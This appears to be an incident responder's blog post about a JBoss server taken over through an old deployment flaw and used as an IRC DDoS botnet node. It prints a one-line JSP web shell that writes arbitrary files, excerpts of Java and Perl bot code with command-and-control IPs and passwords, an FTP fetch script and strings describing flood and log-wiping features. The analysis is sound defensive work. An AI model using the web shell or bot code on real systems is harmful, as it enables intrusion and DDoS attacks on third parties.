Warning! This post is long, mostly because it contains strings and code pulled from over a half-dozen files.
Warning! This post contains strings that may be considered NSFW depending upon your work environment and your sensitivity levels.
We were made aware of this particular attack when one of our client's ISPs contacted us because they, in turn, had been contacted by a game server hosting company who had stated that our client's WAN IP had been attacking them as part of a DDoS attack. After asking a few initial questions of the ISP's security analyst (when did the attack start, what protocol was being used, could I get some log files, etc.), I got right to work.
I first started a packet capture on the client's firewall. I started out by playing around with a few more specific capture filters, but because the information I had been given by all parties was scant, I instead enabled a wide-open, catch-all packet capture.A few hours later, I returned to the packet capture and began examining it. After only a few minutes, I noted large numbers of requests from the same server to various, random WAN IPs.
I gained access to this server and began by examining what was running on the server with Process Explorer. Immediately I noticed an instance of "cmd.exe" running as a parent for an instance of "javaw.exe", yet I saw no open windows on the server. I took a look at the "javaw.exe" instance and saw the following information:
Path: C:\WINDOWS\system32\javaw.exeCommand line: javaw -cp C:\DOCUMEN~1\ADMINI~1.;PC\LOCALS~1\Temp\jb.jar
Current directory: C:\jboss-4.0.5.GA\jboss-4.0.5.GA\bin\
Alarms are already sounding in my head over this one, for numerous reasons. To confirm my suspicions, I copied "jb.jar" to my local machine for analysis.
Straight away, I opened the file in JD (http://jd.benow.ca/) and began examining it class-by-class. I could already tell I had found my culprit when I saw code and strings such as...
"UDP Flood Finished!""HttpGet Finished!"
HttpURLConnection conn = (HttpURLConnection)this.val$url.openConnection() ... conn.setRequestMethod("GET");
Truly, however, this code was the final piece that gave me certainty that I had found what I was looking for:
public class Client{
public static Client instance;
private String ircServer = "192.3.138.202";
private String ircPassword = "tutakamo24";
private String ircChannel = "#j";
private String ircChannelPass = "";
private String ircNick = "";
private String botNumber;
private int ircPort = 80;
private Socket ircSocket;
private PrintWriter out;
private BufferedReader in;
private String botPassword = "Net.Admin";
private boolean botSilent = false;
private String botTempDir = System.getProperty("java.io.tmpdir");
private double botVersion = 1.03D;
private String osName = System.getProperty("os.name");
private String country = System.getProperty("user.country").toUpperCase();
private String username = System.getProperty("user.name");
...
} else if ((command[0].equals(".slowloris")) && (command.length == 4)) {
floodSlowloris(command[1], Integer.decode(command[2]).intValue(), Integer.decode(command[3]).intValue());
So, we are dealing with an IRC botnet that performs DDoS attacks. Using Slowloris (https://en.wikipedia.org/wiki/Slowloris_%28software%29) (which is a Perl-based "stress tester", for those not in the know). We know as much now. But there is much more information to be gleaned during this incident, so read on!
The code in that file continued, but those are fine-grain details that I will address during deep analysis. For now, we just want to keep finding out how compromised this server truly is. As noted above, the current directory was "C:\jboss-4.0.5.GA\jboss-4.0.5.GA\bin\". That's right, kiddos. That is a version of JBoss that is 9 years old. I am not going into a long list of all the exploits available for this version of JBoss, but I can tell you that 10 seconds of Googling profited me with this:
https://threatpost.com/jboss-attacks-up-since-exploit-code-disclosure/102971/
Which then led me to this:
https://www.exploit-db.com/exploits/28713/
You may notice in the POC code that a .WAR file is mentioned. Interestingly enough, I found a file call "jb.war" at the root of the C:/ drive. Extracting this .WAR file revealed the following directory tree:
Directory of [REDACTED]\jbMETA-INF
WEB-INF
zs.jsp
Directory of [REDACTED]\jb\META-INF
MANIFEST.MF
Directory of [REDACTED]\jb\WEB-INF
web.xml
The .XML file contains the following markup:
<?xml version="1.0" ?><web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Zsploit Shell</servlet-name>
<jsp-file>/zs.jsp</jsp-file>
</servlet>
</web-app>
There's our "zs.jsp" file. Let's take a look at it:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
Aside from the obvious nature of that code, guess what happens when you Google it?
https://issues.jboss.org/browse/JBAS-9535
Not very fruitful, but it shows that this exploit has been used before, and other people have reported it (note that CVE-2013-4810 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810) is a duplicate of CVE-2010-0738 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738), which the bug reporter mentions in his report.)
So, looks like somebody used an exploit in a painfully old JBoss deployment to drop a payload onto the server, and then dropped other files, namely their Java DDoS IRC Botnet file. Like they say in the infomercial business, though...
But wait, there's more!
I also noted in the JBoss "bin" directory that there were some odd looking files, namely "mudkip.exe", "info.vbs", and "abc.txt" (yes, Mudkip like the Pokemon.) Again, let's examine them in turn.
The file "abc.txt" was fairly simple:
aa
bin
get mudkip.exe
quit
I am not going to paste the contents of "info.vbs", but let me just say that it pulls an overwhelming amount about the system it resides on, including everything from CPU cores to information about the users on the system.
Finally, "mudkip.exe" is a self-extracting archive that drops the file "fox.exe". I'm going to jump right into string analysis with BinText (http://www.mcafee.com/us/downloads/free-tools/bintext.aspx). So, here are the fun strings I found in "fox.exe":
000000003108 000000403108 0 -p2x_exe=000000003114 000000403114 0 -p2x_debug=
000000003150 000000403150 0 RunPerl
000000003180 000000403180 0 p2x5122.dll
00000000318C 00000040318C 0 For more information visit www.indigostar.com
0000000031C8 0000004031C8 0 load Crypt::RSA::Key
0000000031E0 0000004031E0 0 load key 89234p143x9473892x8204
000000003200 000000403200 0 load Crypt::OpenPGP::CFB
000000003244 000000403244 0 NAME=P2X-V06.TOC
000000003288 000000403288 0 DBG: p2xar_open
0000000032A4 0000004032A4 0 DBG: p2xar_close
000000003564 000000403564 0 Perl2Exe
000000003244 000000403244 0 NAME=P2X-V06.TOC
000000003288 000000403288 0 DBG: p2xar_open
0000000032A4 0000004032A4 0 DBG: p2xar_close
000000003564 000000403564 0 Perl2Exe
000000016B5A 000000416B5A 0 Perl_Isv_undef_ptr
000000016B70 000000416B70 0 PerlIO_getpos
000000016B80 000000416B80 0 Perl_sv_newmortal
...(those lines go on and on and are repeated multiple times throughout, but I am leaving them out because you get the picture)
000000019584 000000419584 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\perl\lib\auto\IO\IO.pdb
00000005B36D 00000045B36D 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\perl\lib\auto\re\re.pdb
0000000663B6 0000004663B6 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\PathTools\blib\arch\auto\Cwd\Cwd.pdb
0000000712DA 0000004712DA 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\Scalar-List-Utils\blib\arch\auto\List\Util\Util.pdb
00000008B094 00000048B094 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\perl\lib\auto\B\B.pdb
000000092A65 000000492A65 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\perl\lib\auto\mro\mro.pdb
0000000AC44C 0000004AC44C 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\perl\lib\auto\Win32API\File\File.pdb
0000000B33BB 0000004B33BB 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\perl\lib\auto\Fcntl\Fcntl.pdb
0000000E65D0 0000004E65D0 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\Win32\blib\arch\auto\Win32\Win32.pdb
0000000FB0B7 0000004FB0B7 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\Win32-Console\blib\arch\auto\Win32\Console\Console.pdb
00000010325D 00000050325D 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\perl\lib\auto\Socket\Socket.pdb
00000010FC11 00000050FC11 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\Win32-API\blib\arch\auto\Win32\API\API.pdb
00000000511A 00000040511A 0 PERLEXE
00000000556E 00000040556E 0 VS_VERSION_INFO
0000000055CA 0000004055CA 0 StringFileInfo
0000000055EE 0000004055EE 0 040904E4
000000005606 000000405606 0 CompanyName
000000005622 000000405622 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
00000000570A 00000040570A 0 FileDescription
00000000572E 00000040572E 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
00000000581E 00000040581E 0 FileVersion
000000005838 000000405838 0 1.0.0.0
000000005848 000000405848 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
000000005922 000000405922 0 InternalName
00000000593E 00000040593E 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
000000005A26 000000405A26 0 LegalCopyright
000000005A46 000000405A46 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
000000005B32 000000405B32 0 LegalTrademarks
000000005B56 000000405B56 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
000000005C46 000000405C46 0 OriginalFilename
000000005C6A 000000405C6A 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
000000005D5A 000000405D5A 0 ProductName
000000005D76 000000405D76 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
000000005E5E 000000405E5E 0 ProductVersion
000000005E7E 000000405E7E 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
000000005F6A 000000405F6A 0 Comment
000000005F7E 000000405F7E 0 zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
000000172E79 000000572E79 0 VS_VERSION_INFO
000000172ED5 000000572ED5 0 StringFileInfo
000000172EF9 000000572EF9 0 040904E4
000000172F11 000000572F11 0 CompanyName
000000172F2B 000000572F2B 0 IndigoSTAR Software.
000000172F5D 000000572F5D 0 FileDescription
000000172F7F 000000572F7F 0 Perl Interpreter
000000172FA9 000000572FA9 0 FileVersion
000000172FC3 000000572FC3 0 5,12,2,2010.11
000000172FE9 000000572FE9 0 InternalName
000000173003 000000573003 0 perl510.dll
000000173021 000000573021 0 LegalCopyright
00000017303F 00000057303F 0 Copyright 1987-2007, Larry Wall, Binary build by IndigoSTAR Software, http://www.indigostar.com
000000173105 000000573105 0 LegalTrademarks
00000017312D 00000057312D 0 OriginalFilename
00000017314F 00000057314F 0 perl510.dll
00000017316D 00000057316D 0 ProductName
000000173187 000000573187 0 IndigoPerl
0000001731A5 0000005731A5 0 ProductVersion
0000001731C3 0000005731C3 0 Build 2010.11
00000000321C 00000040321C 0 signature
00000000322C 00000040322C 0 dbload 1.0
00000000323C 00000040323C 0 SIZE=
000000003244 000000403244 0 NAME=P2X-V06.TOC
000000007010 000000407010 0 W:\dev\p2x-10.10\Win32\stubbuild-5122\p2x5122exe.pdb
00000005B36D 00000045B36D 0 C:\cygwin\home\gecko\build-20101209T040008-vpvlvryzmv\perl\lib\auto\re\re.pdb
000000086920 000000486920 0 PERLSI_REQUIRE
000000086930 000000486930 0 PERLSI_DIEHOOK
000000086940 000000486940 0 PERLSI_WARNHOOK
000000086950 000000486950 0 PERLSI_DESTROY
000000086960 000000486960 0 PERLSI_OVERLOAD
000000086970 000000486970 0 PERLSI_SIGNAL
000000086980 000000486980 0 PERLSI_SORT
00000008698C 00000048698C 0 PERLSI_MAGIC
00000008699C 00000048699C 0 PERLSI_MAIN
0000000869A8 0000004869A8 0 PERLSI_UNDEF
000000086B64 000000486B64 0 PERL_LOADMOD_IMPORT_OPS
000000086B7C 000000486B7C 0 PERL_LOADMOD_NOIMPORT
000000086B94 000000486B94 0 PERL_LOADMOD_DENY
Wow. So, the most important thing to take away from all of that is that this is a Perl program that has been "compiled" into a .EXE file using Perl2Exe (http://www.indigostar.com/perl2exe.php). Also, an RSA key is listed plain as day in the strings. We may have more fun in deep analysis with that later, especially when you look at stuff like this: http://www.securityfocus.com/archive/1/312757. Anyway, Perl2Exe program, Slowloris is written in Perl... you get the idea.
At this point, I would have run out of files to examine and just called it good. We know how the attackers got in, we know what they were doing and what they were doing it with, and we know who they were attacking, at least in part. But...
Any good incident responder knows that you can't just pass up anti-virus logs. And I didn't, but they were empty. The quarantine, on the other hand, was not. It contained 2 files from 6 months prior to the current incident, meaning this server had been owned for at least half a year. Those files were located in C:\DOCUME~1\ADMINI~1.LOC\LOCALS~1\Temp\par-41646d696e6973747261746f72 and were as follows:
432f8669.pla.pl
More Perl stuff! I started looking at the contents of these files and, as figured, I saw IRC and DDoS related information; here are some excerpts:
my @canais = ("##win");my $processo = 'java';
my @hostauth = ('*');
my $linas_max = '10';
my $sleep = '0.01';
my @nickname = getnick();
my $nick = $nickname[ rand scalar @nickname ];
my @privname = getonowner();
my $ircname = $privname[ rand scalar @privname ];
chop( my $realname = 'NiX' );
my $servidor = '178.62.151.130' unless $servidor;
my $porta = '443';
my $destroypass = "dongusvondong";
my $viruspass = "COCKS";
...
servidor = "$ARGV[0]" if $ARGV[0];
$0 = "$processo" . "\0" x 16;
my $pid = fork;
exit if $pid;
die "Masalah fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
...
0000000185C 00000000185C 0 12 Thanks for purchasing! Please use IP only to ensure correct booting! There is NO STOP COMMAND! Be very careful with boot times. These are the commands you have access to:"
000000001971 000000001971 0 12 There are 5 DDoS functions"
0000000019F6 0000000019F6 0 12 UDPFlood, HTTPFlood , SYNFlood, NTP Amplified Flood"
000000001D8E 000000001D8E 0 12 Lastly, there is a mail spam that is used like so:"
000000001F00 000000001F00 0 12] This process can be long, just wait"
00000000223E 00000000223E 0 12] All default log and bash_history files erased"
0000000022F2 0000000022F2 0 12] Now Erasing the rest of the machine log files"
0000000024BC 0000000024BC 0 12] Done! All logs erased"
00000000255C 00000000255C 0 12 ] Good-bye cruel cruel world! ;(");
000000004573 000000004573 0 12 ] You messed up n00b")
0000000047A6 0000000047A6 0 12 ] Attack Complete!");
00000000530E 00000000530E 0 12] File being downloaded now! Please wait...
000000005DF9 000000005DF9 0 12] Attacking Complete!
There were also lots of fun NSFW strings, and other feedback/interaction type strings, but I do not want to include all of them in here. There was also a massive list of IPs hardcoded as well. I checked, but the victim that reported this to us was not in the list; I didn't imagine they would be, seeing that the files were half a year old.
I did note that a large portion of this Perl script is present in the following script, which is part of a PHP honeypot:
https://github.com/mushorg/phpox/blob/master/lang/code2.pl
Well, that basically completes my quick and dirty analysis of this incident. Again, there could be much deeper analysis of these files, and I very well may do such an analysis because I want to get some IOCs created and maybe even try for attribution. That will come at a later date and with a later post.
Cheers! As always, stay safe out there, and check out the files below.
